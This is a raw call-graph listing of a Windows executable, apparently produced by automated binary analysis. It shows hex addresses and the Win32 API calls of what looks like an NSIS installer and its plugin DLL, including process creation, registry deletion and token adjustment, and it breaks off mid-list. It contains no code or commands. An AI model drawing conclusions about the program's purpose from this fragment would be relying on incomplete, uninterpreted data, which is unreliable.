40140b 2 API calls 4798->4803 4799->4793 4804 401389 2 API calls 4799->4804 4827 404096 4800->4827 4807 403f0c SetWindowLongW 4801->4807 4808 403f1d 4801->4808 4806 404309 4802->4806 4803->4799 4809 40405c 4804->4809 4806->4805 4815 404319 ShowWindow 4806->4815 4807->4805 4812 403fc6 4808->4812 4813 403f29 GetDlgItem 4808->4813 4809->4793 4814 404060 SendMessageW 4809->4814 4810 40140b 2 API calls 4810->4827 4811 4042ea DestroyWindow EndDialog 4811->4806 4868 4043c6 4812->4868 4816 403f59 4813->4816 4817 403f3c SendMessageW IsWindowEnabled 4813->4817 4814->4805 4815->4805 4820 403f66 4816->4820 4822 403fad SendMessageW 4816->4822 4823 403f79 4816->4823 4831 403f5e 4816->4831 4817->4805 4817->4816 4819 40640a 17 API calls 4819->4827 4820->4822 4820->4831 4822->4812 4824 403f81 4823->4824 4825 403f96 4823->4825 4828 40140b 2 API calls 4824->4828 4829 40140b 2 API calls 4825->4829 4826 403f94 4826->4812 4827->4805 4827->4810 4827->4811 4827->4819 4830 40435f 18 API calls 4827->4830 4849 40422a DestroyWindow 4827->4849 4859 40435f 4827->4859 4828->4831 4832 403f9d 4829->4832 4830->4827 4865 404338 4831->4865 4832->4812 4832->4831 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4827 4849->4806 4850 404244 CreateDialogParamW 4849->4850 4850->4806 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4805 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4806 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4826 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4805 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5651 401f06 5652 402c41 17 API calls 5651->5652 5653 401f0c 5652->5653 5654 405450 24 API calls 5653->5654 5655 401f16 5654->5655 5656 4059d1 2 API calls 5655->5656 5657 401f1c 5656->5657 5658 40288b 5657->5658 5660 406873 5 API calls 5657->5660 5662 401f3f CloseHandle 5657->5662 5661 401f31 5660->5661 5661->5662 5664 40632f wsprintfW 5661->5664 5662->5658 5664->5662 5665 404809 5666 404819 5665->5666 5667 40483f 5665->5667 5668 40435f 18 API calls 5666->5668 5669 4043c6 8 API calls 5667->5669 5670 404826 SetDlgItemTextW 5668->5670 5671 40484b 5669->5671 5670->5667 5672 40190c 5673 401943 5672->5673 5674 402c41 17 API calls 5673->5674 5675 401948 5674->5675 5676 405afa 67 API calls 5675->5676 5677 401951 5676->5677 5678 40230c 5679 402314 5678->5679 5681 40231a 5678->5681 5680 402c41 17 API calls 5679->5680 5680->5681 5682 402c41 17 API calls 5681->5682 5683 402328 5681->5683 5682->5683 5684 402c41 17 API calls 5683->5684 5686 402336 5683->5686 5684->5686 5685 402c41 17 API calls 5687 40233f WritePrivateProfileStringW 5685->5687 5686->5685 5688 401f8c 5689 402c41 17 API calls 5688->5689 5690 401f93 5689->5690 5691 4067c2 5 API calls 5690->5691 5692 401fa2 5691->5692 5693 401fbe GlobalAlloc 5692->5693 5702 402026 5692->5702 5694 401fd2 5693->5694 5693->5702 5695 4067c2 5 API calls 5694->5695 5696 401fd9 5695->5696 5697 4067c2 5 API calls 5696->5697 5698 401fe3 5697->5698 5698->5702 5703 40632f wsprintfW 5698->5703 5700 402018 5704 40632f wsprintfW 5700->5704 5703->5700 5704->5702 5705 6f941058 5707 6f941074 5705->5707 5706 6f9410dd 5707->5706 5708 6f941516 GlobalFree 5707->5708 5709 6f941092 5707->5709 5708->5709 5710 6f941516 GlobalFree 5709->5710 5711 6f9410a2 5710->5711 5712 6f9410b2 5711->5712 5713 6f9410a9 GlobalSize 5711->5713 5714 6f9410b6 GlobalAlloc 5712->5714 5715 6f9410c7 5712->5715 5713->5712 5716 6f94153d 3 API calls 5714->5716 5717 6f9410d2 GlobalFree 5715->5717 5716->5715 5717->5706 5718 6f9418d9 5720 6f9418fc 5718->5720 5719 6f941943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5722 6f941272 2 API calls 5719->5722 5720->5719 5721 6f941931 GlobalFree 5720->5721 5721->5719 5723 6f941ace GlobalFree GlobalFree 5722->5723 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4990 402c41 17 API calls 4987->4990 4989 402c81 17 API calls 4988->4989 4991 40239d 4989->4991 4992 4023c8 4990->4992 4993 4023a7 4991->4993 4996 4023d5 4991->4996 4998 402cff 4992->4998 4995 402c41 17 API calls 4993->4995 4997 4023ae RegDeleteValueW RegCloseKey 4995->4997 4997->4996 4999 402d0c 4998->4999 5000 402d13 4998->5000 4999->4996 5000->4999 5002 402d44 5000->5002 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402d76 5004->5005 5006 402dec 5004->5006 5007 402d98 RegEnumKeyW 5005->5007 5008 402daf RegCloseKey 5005->5008 5009 402dd0 RegCloseKey 5005->5009 5011 402d44 6 API calls 5005->5011 5006->4999 5007->5005 5007->5008 5010 4067c2 5 API calls 5008->5010 5009->5006 5012 402dbf 5010->5012 5011->5005 5013 402de0 RegDeleteKeyW 5012->5013 5014 402dc3 5012->5014 5013->5006 5014->5006 5724 40190f 5725 402c41 17 API calls 5724->5725 5726 401916 5725->5726 5727 405a4e MessageBoxIndirectW 5726->5727 5728 40191f 5727->5728 5729 40558f 5730 4055b0 GetDlgItem GetDlgItem GetDlgItem 5729->5730 5731 405739 5729->5731 5774 404394 SendMessageW 5730->5774 5733 405742 GetDlgItem CreateThread CloseHandle 5731->5733 5736 40576a 5731->5736 5733->5736 5734 405620 5740 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5734->5740 5735 405795 5739 4057f5 5735->5739 5742 4057a9 5735->5742 5743 4057cf ShowWindow 5735->5743 5736->5735 5737 405781 ShowWindow ShowWindow 5736->5737 5738 4057ba 5736->5738 5776 404394 SendMessageW 5737->5776 5744 4043c6 8 API calls 5738->5744 5739->5738 5750 405803 SendMessageW 5739->5750 5748 405695 5740->5748 5749 405679 SendMessageW SendMessageW 5740->5749 5751 404338 SendMessageW 5742->5751 5746 4057e1 5743->5746 5747 4057ef 5743->5747 5745 4057c8 5744->5745 5752 405450 24 API calls 5746->5752 5753 404338 SendMessageW 5747->5753 5754 4056a8 5748->5754 5755 40569a SendMessageW 5748->5755 5749->5748 5750->5745 5756 40581c CreatePopupMenu 5750->5756 5751->5738 5752->5747 5753->5739 5758 40435f 18 API calls 5754->5758 5755->5754 5757 40640a 17 API calls 5756->5757 5759 40582c AppendMenuW 5757->5759 5760 4056b8 5758->5760 5761 405849 GetWindowRect 5759->5761 5762 40585c TrackPopupMenu 5759->5762 5763 4056c1 ShowWindow 5760->5763 5764 4056f5 GetDlgItem SendMessageW 5760->5764 5761->5762 5762->5745 5766 405877 5762->5766 5767 4056e4 5763->5767 5768 4056d7 ShowWindow 5763->5768 5764->5745 5765 40571c SendMessageW SendMessageW 5764->5765 5765->5745 5769 405893 SendMessageW 5766->5769 5775 404394 SendMessageW 5767->5775 5768->5767 5769->5769 5770 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5769->5770 5772 4058d5 SendMessageW 5770->5772 5772->5772 5773 4058fe GlobalUnlock SetClipboardData CloseClipboard 5772->5773 5773->5745 5774->5734 5775->5764 5776->5735 5777 401491 5778 405450 24 API calls 5777->5778 5779 401498 5778->5779 5787 401d14 5788 402c1f 17 API calls 5787->5788 5789 401d1b 5788->5789 5790 402c1f 17 API calls 5789->5790 5791 401d27 GetDlgItem 5790->5791 5792 402592 5791->5792 5793 404495 lstrcpynW lstrlenW 5794 403a96 5795 403aa1 5794->5795 5796 403aa5 5795->5796 5797 403aa8 GlobalAlloc 5795->5797 5797->5796 5798 402598 5799 4025c7 5798->5799 5800 4025ac 5798->5800 5802 4025fb 5799->5802 5803 4025cc 5799->5803 5801 402c1f 17 API calls 5800->5801 5810 4025b3 5801->5810 5805 402c41 17 API calls 5802->5805 5804 402c41 17 API calls 5803->5804 5806 4025d3 WideCharToMultiByte lstrlenA 5804->5806 5807 402602 lstrlenW 5805->5807 5806->5810 5807->5810 5808 40262f 5809 402645 5808->5809 5811 405f90 WriteFile 5808->5811 5810->5808 5810->5809 5812 405fbf 5 API calls 5810->5812 5811->5809 5812->5808 5813 40451e 5814 404536 5813->5814 5817 404650 5813->5817 5818 40435f 18 API calls 5814->5818 5815 4046ba 5816 4046c4 GetDlgItem 5815->5816 5819 404784 5815->5819 5820 404745 5816->5820 5821 4046de 5816->5821 5817->5815 5817->5819 5822 40468b GetDlgItem SendMessageW 5817->5822 5823 40459d 5818->5823 5824 4043c6 8 API calls 5819->5824 5820->5819 5825 404757 5820->5825 5821->5820 5829 404704 SendMessageW LoadCursorW SetCursor 5821->5829 5846 404381 EnableWindow 5822->5846 5827 40435f 18 API calls 5823->5827 5828 40477f 5824->5828 5830 40476d 5825->5830 5831 40475d SendMessageW 5825->5831 5833 4045aa CheckDlgButton 5827->5833 5847 4047cd 5829->5847 5830->5828 5836 404773 SendMessageW 5830->5836 5831->5830 5832 4046b5 5837 4047a9 SendMessageW 5832->5837 5844 404381 EnableWindow 5833->5844 5836->5828 5837->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5828 5843->5842 5844->5839 5845->5841 5846->5832 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5820 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4572 4035c6 4563->4572 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4569 403474 12 API calls 4567->4569 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4573 40370f 4569->4573 4570 405cea CharNextW 4570->4572 4572->4570 4577 4036c2 4572->4577 4578 4036c0 4572->4578 4573->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4573->4575 4574 40375d 4583 405cea CharNextW 4574->4583 4616 403800 4574->4616 4629 403810 4574->4629 4576 403474 12 API calls 4575->4576 4581 403741 4576->4581 4732 4063e8 lstrcpynW 4577->4732 4578->4564 4581->4568 4581->4629 4587 40377c 4583->4587 4585 40394a 4589 403952 GetCurrentProcess OpenProcessToken 4585->4589 4590 4039ce ExitProcess 4585->4590 4586 40382a 4744 405a4e 4586->4744 4593 403840 4587->4593 4594 4037da 4587->4594 4595 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4589->4595 4596 40399e 4589->4596 4598 4059b9 5 API calls 4593->4598 4597 405dc5 18 API calls 4594->4597 4595->4596 4599 4067c2 5 API calls 4596->4599 4600 4037e6 4597->4600 4601 403845 lstrcatW 4598->4601 4602 4039a5 4599->4602 4600->4629 4733 4063e8 lstrcpynW 4600->4733 4603 403861 lstrcatW lstrcmpiW 4601->4603 4604 403856 lstrcatW 4601->4604 4605 4039ba ExitWindowsEx 4602->4605 4608 4039c7 4602->4608 4607 40387d 4603->4607 4603->4629 4604->4603 4605->4590 4605->4608 4611 403882 4607->4611 4612 403889 4607->4612 4609 40140b 2 API calls 4608->4609 4609->4590 4610 4037f5 4734 4063e8 lstrcpynW 4610->4734 4614 40591f 4 API calls 4611->4614 4615 40599c 2 API calls 4612->4615 4617 403887 4614->4617 4618 40388e SetCurrentDirectoryW 4615->4618 4676 403ad8 4616->4676 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4627 4061ae 36 API calls 4626->4627 4627->4629 4628 4061ae 36 API calls 4628->4631 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4628 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4638 403480 4637->4638 4639 40348a 4638->4639 4640 405cbd 3 API calls 4638->4640 4639->4566 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4675 402f80 4648->4675 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4673 402fbe 4654->4673 4656 402e8e 32 API calls 4655->4656 4657 4030af 4656->4657 4659 4030eb GlobalAlloc 4657->4659 4657->4675 4761 40345d SetFilePointer 4657->4761 4658 403447 ReadFile 4658->4673 4663 403102 4659->4663 4660 403143 4661 402e8e 32 API calls 4660->4661 4661->4675 4667 405f0d 2 API calls 4663->4667 4664 4030cc 4665 403447 ReadFile 4664->4665 4668 4030d7 4665->4668 4666 402e8e 32 API calls 4666->4673 4669 403113 CreateFileW 4667->4669 4668->4659 4668->4675 4670 40314d 4669->4670 4669->4675 4760 40345d SetFilePointer 4670->4760 4672 40315b 4674 4031d6 44 API calls 4672->4674 4673->4655 4673->4658 4673->4660 4673->4666 4673->4675 4674->4675 4675->4574 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4683 403b53 lstrcatW 4682->4683 4685 4062b6 3 API calls 4682->4685 4686 403b02 4683->4686 4685->4683 4762 403dae 4686->4762 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4693 4062b6 3 API calls 4690->4693 4692 405dc5 18 API calls 4691->4692 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4699 40640a 17 API calls 4694->4699 4695->4691 4702 403bd8 lstrlenW 4695->4702 4706 405cea CharNextW 4695->4706 4697 403cd5 4696->4697 4698 403c56 RegisterClassW 4696->4698 4701 40140b 2 API calls 4697->4701 4700 403c8c SystemParametersInfoW CreateWindowExW 4698->4700 4731 403cdf 4698->4731 4699->4696 4700->4697 4705 403cdb 4701->4705 4703 403be6 lstrcmpiW 4702->4703 4704 403c0c 4702->4704 4703->4704 4707 403bf6 GetFileAttributesW 4703->4707 4708 405cbd 3 API calls 4704->4708 4711 403dae 18 API calls 4705->4711 4705->4731 4709 403bd5 4706->4709 4710 403c02 4707->4710 4712 403c12 4708->4712 4709->4702 4710->4704 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4704 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4721 403d10 4719->4721 4720 403d81 4722 403d85 4720->4722 4723 403d9d 4720->4723 4724 403d1e GetClassInfoW 4721->4724 4726 406752 3 API calls 4721->4726 4730 40140b 2 API calls 4722->4730 4722->4731 4725 40140b 2 API calls 4723->4725 4727 403d32 GetClassInfoW RegisterClassW 4724->4727 4728 403d48 DialogBoxParamW 4724->4728 4725->4731 4726->4724 4727->4728 4729 40140b 2 API calls 4728->4729 4729->4731 4730->4731 4731->4629 4732->4578 4733->4610 4734->4616 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4585 4743->4586 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4672 4761->4664 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4691 4773 4043ab SendMessageW 4772->4773 4774 405546 4773->4774 4777 40556d 4774->4777 4778 401389 2 API calls 4774->4778 4775 4043ab SendMessageW 4776 40557f OleUninitialize 4775->4776 4776->4720 4777->4775 4778->4774 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5887 404ba6 5888 404bd2 5887->5888 5889 404bb6 5887->5889 5891 404c05 5888->5891 5892 404bd8 SHGetPathFromIDListW 5888->5892 5898 405a32 GetDlgItemTextW 5889->5898 5894 404be8 5892->5894 5897 404bef SendMessageW 5892->5897 5893 404bc3 SendMessageW 5893->5888 5895 40140b 2 API calls 5894->5895 5895->5897 5897->5891 5898->5893 5913 4029a8 5914 402c1f 17 API calls 5913->5914 5915 4029ae 5914->5915 5916 4029d5 5915->5916 5917 4029ee 5915->5917 5920 40288b 5915->5920 5921 4029da 5916->5921 5922 4029eb 5916->5922 5918 402a08 5917->5918 5919 4029f8 5917->5919 5924 40640a 17 API calls 5918->5924 5923 402c1f 17 API calls 5919->5923 5927 4063e8 lstrcpynW 5921->5927 5922->5920 5928 40632f wsprintfW 5922->5928 5923->5922 5924->5922 5927->5920 5928->5920 5929 6f9422fd 5930 6f942367 5929->5930 5931 6f942372 GlobalAlloc 5930->5931 5932 6f942391 5930->5932 5931->5930 5933 4028ad 5934 402c41 17 API calls 5933->5934 5936 4028bb 5934->5936 5935 4028d1 5938 405eb9 2 API calls 5935->5938 5936->5935 5937 402c41 17 API calls 5936->5937 5937->5935 5939 4028d7 5938->5939 5961 405ede GetFileAttributesW CreateFileW 5939->5961 5941 4028e4 5942 4028f0 GlobalAlloc 5941->5942 5943 402987 5941->5943 5944 402909 5942->5944 5945 40297e CloseHandle 5942->5945 5946 4029a2 5943->5946 5947 40298f DeleteFileW 5943->5947 5962 40345d SetFilePointer 5944->5962 5945->5943 5947->5946 5949 40290f 5950 403447 ReadFile 5949->5950 5951 402918 GlobalAlloc 5950->5951 5952 402928 5951->5952 5953 40295c 5951->5953 5954 4031d6 44 API calls 5952->5954 5955 405f90 WriteFile 5953->5955 5960 402935 5954->5960 5956 402968 GlobalFree 5955->5956 5957 4031d6 44 API calls 5956->5957 5958 40297b 5957->5958 5958->5945 5959 402953 GlobalFree 5959->5953 5960->5959 5961->5941 5962->5949 5970 401a30 5971 402c41 17 API calls 5970->5971 5972 401a39 ExpandEnvironmentStringsW 5971->5972 5973 401a4d 5972->5973 5975 401a60 5972->5975 5974 401a52 lstrcmpW 5973->5974 5973->5975 5974->5975 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5070 401423 24 API calls 5068->5070 5071 40204b 5069->5071 5077 402250 5070->5077 5072 402c41 17 API calls 5071->5072 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5076 40207b 5074->5076 5075->5074 5075->5076 5089 406831 WideCharToMultiByte 5076->5089 5080 4020c5 5084 405450 24 API calls 5080->5084 5081 40208c 5082 402094 5081->5082 5083 4020ab 5081->5083 5086 401423 24 API calls 5082->5086 5092 6f941777 5083->5092 5085 40209c 5084->5085 5085->5077 5087 4020e8 FreeLibrary 5085->5087 5086->5085 5087->5077 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 6f9417aa 5092->5093 5134 6f941b5f 5093->5134 5095 6f9417b1 5096 6f9418d6 5095->5096 5097 6f9417c2 5095->5097 5098 6f9417c9 5095->5098 5096->5085 5184 6f942352 5097->5184 5168 6f942394 5098->5168 5103 6f94182d 5108 6f941833 5103->5108 5109 6f94187e 5103->5109 5104 6f94180f 5197 6f942569 5104->5197 5105 6f9417df 5112 6f9417e5 5105->5112 5113 6f9417f0 5105->5113 5106 6f9417f8 5117 6f9417ee 5106->5117 5194 6f942d37 5106->5194 5216 6f9415c6 5108->5216 5110 6f942569 10 API calls 5109->5110 5118 6f94186f 5110->5118 5111 6f941815 5208 6f9415b4 5111->5208 5112->5117 5178 6f942aac 5112->5178 5188 6f942724 5113->5188 5117->5103 5117->5104 5125 6f9418c5 5118->5125 5222 6f94252c 5118->5222 5123 6f9417f6 5123->5117 5124 6f942569 10 API calls 5124->5118 5125->5096 5129 6f9418cf GlobalFree 5125->5129 5129->5096 5131 6f9418b1 5131->5125 5226 6f94153d wsprintfW 5131->5226 5132 6f9418aa FreeLibrary 5132->5131 5229 6f94121b GlobalAlloc 5134->5229 5136 6f941b83 5230 6f94121b GlobalAlloc 5136->5230 5138 6f941da9 GlobalFree GlobalFree GlobalFree 5139 6f941dc6 5138->5139 5154 6f941e10 5138->5154 5140 6f942192 5139->5140 5149 6f941ddb 5139->5149 5139->5154 5142 6f9421b4 GetModuleHandleW 5140->5142 5140->5154 5141 6f941c64 GlobalAlloc 5160 6f941b8e 5141->5160 5144 6f9421c5 LoadLibraryW 5142->5144 5145 6f9421da 5142->5145 5143 6f941ccd GlobalFree 5143->5160 5144->5145 5144->5154 5237 6f94161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5145->5237 5146 6f941caf lstrcpyW 5148 6f941cb9 lstrcpyW 5146->5148 5148->5160 5149->5154 5233 6f94122c 5149->5233 5150 6f94222c 5152 6f942239 lstrlenW 5150->5152 5150->5154 5238 6f94161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5152->5238 5153 6f942064 5236 6f94121b GlobalAlloc 5153->5236 5154->5095 5155 6f9421ec 5155->5150 5166 6f942216 GetProcAddress 5155->5166 5156 6f9420ec 5156->5154 5163 6f942134 lstrcpyW 5156->5163 5159 6f942253 5159->5154 5160->5138 5160->5141 5160->5143 5160->5146 5160->5148 5160->5153 5160->5154 5160->5156 5161 6f941d0b 5160->5161 5162 6f941fa5 GlobalFree 5160->5162 5164 6f94122c 2 API calls 5160->5164 5161->5160 5231 6f94158f GlobalSize GlobalAlloc 5161->5231 5162->5160 5163->5154 5164->5160 5166->5150 5167 6f94206d 5167->5095 5174 6f9423ac 5168->5174 5170 6f9424d5 GlobalFree 5173 6f9417cf 5170->5173 5170->5174 5171 6f942454 GlobalAlloc WideCharToMultiByte 5171->5170 5172 6f94247f GlobalAlloc CLSIDFromString 5172->5170 5173->5105 5173->5106 5173->5117 5174->5170 5174->5171 5174->5172 5175 6f94122c GlobalAlloc lstrcpynW 5174->5175 5177 6f94249e 5174->5177 5240 6f9412ba 5174->5240 5175->5174 5177->5170 5244 6f9426b8 5177->5244 5180 6f942abe 5178->5180 5179 6f942b63 CreateFileA 5183 6f942b81 5179->5183 5180->5179 5182 6f942c4d 5182->5117 5247 6f942a56 5183->5247 5185 6f942367 5184->5185 5186 6f942372 GlobalAlloc 5185->5186 5187 6f9417c8 5185->5187 5186->5185 5187->5098 5192 6f942754 5188->5192 5189 6f942802 5191 6f942808 GlobalSize 5189->5191 5193 6f942812 5189->5193 5190 6f9427ef GlobalAlloc 5190->5193 5191->5193 5192->5189 5192->5190 5193->5123 5195 6f942d42 5194->5195 5196 6f942d82 GlobalFree 5195->5196 5251 6f94121b GlobalAlloc 5197->5251 5199 6f9425ec MultiByteToWideChar 5205 6f942573 5199->5205 5200 6f94260e StringFromGUID2 5200->5205 5201 6f94261f lstrcpynW 5201->5205 5202 6f942632 wsprintfW 5202->5205 5203 6f942656 GlobalFree 5203->5205 5204 6f94268b GlobalFree 5204->5111 5205->5199 5205->5200 5205->5201 5205->5202 5205->5203 5205->5204 5206 6f941272 2 API calls 5205->5206 5252 6f9412e1 5205->5252 5206->5205 5256 6f94121b GlobalAlloc 5208->5256 5210 6f9415b9 5211 6f9415c6 2 API calls 5210->5211 5212 6f9415c3 5211->5212 5213 6f941272 5212->5213 5214 6f9412b5 GlobalFree 5213->5214 5215 6f94127b GlobalAlloc lstrcpynW 5213->5215 5214->5118 5215->5214 5217 6f9415ff lstrcpyW 5216->5217 5219 6f9415d2 wsprintfW 5216->5219 5221 6f941618 5217->5221 5219->5221 5221->5124 5223 6f941891 5222->5223 5224 6f94253a 5222->5224 5223->5131 5223->5132 5224->5223 5225 6f942556 GlobalFree 5224->5225 5225->5224 5227 6f941272 2 API calls 5226->5227 5228 6f94155e 5227->5228 5228->5125 5229->5136 5230->5160 5232 6f9415ad 5231->5232 5232->5161 5239 6f94121b GlobalAlloc 5233->5239 5235 6f94123b lstrcpynW 5235->5154 5236->5167 5237->5155 5238->5159 5239->5235 5241 6f9412c1 5240->5241 5242 6f94122c 2 API calls 5241->5242 5243 6f9412df 5242->5243 5243->5174 5245 6f9426c6 VirtualAlloc 5244->5245 5246 6f94271c 5244->5246 5245->5246 5246->5177 5248 6f942a61 5247->5248 5249 6f942a66 GetLastError 5248->5249 5250 6f942a71 5248->5250 5249->5250 5250->5182 5251->5205 5253 6f94130c 5252->5253 5254 6f9412ea 5252->5254 5253->5205 5254->5253 5255 6f9412f0 lstrcpyW 5254->5255 5255->5253 5256->5210 5981 402a35 5982 402c1f 17 API calls 5981->5982 5983 402a3b 5982->5983 5984 402a72 5983->5984 5985 40288b 5983->5985 5987 402a4d 5983->5987 5984->5985 5986 40640a 17 API calls 5984->5986 5986->5985 5987->5985 5989 40632f wsprintfW 5987->5989 5989->5985 5990 401735 5991 402c41 17 API calls 5990->5991 5992 40173c SearchPathW 5991->5992 5993 401757 5992->5993 5995 4029e6 5992->5995 5993->5995 5996 4063e8 lstrcpynW 5993->5996 5996->5995 5997 6f9410e1 5998 6f941111 5997->5998 5999 6f9411d8 GlobalFree 5998->5999 6000 6f9412ba 2 API calls 5998->6000 6001 6f9411d3 5998->6001 6002 6f941272 2 API calls 5998->6002 6003 6f941164 GlobalAlloc 5998->6003 6004 6f9411f8 GlobalFree 5998->6004 6005 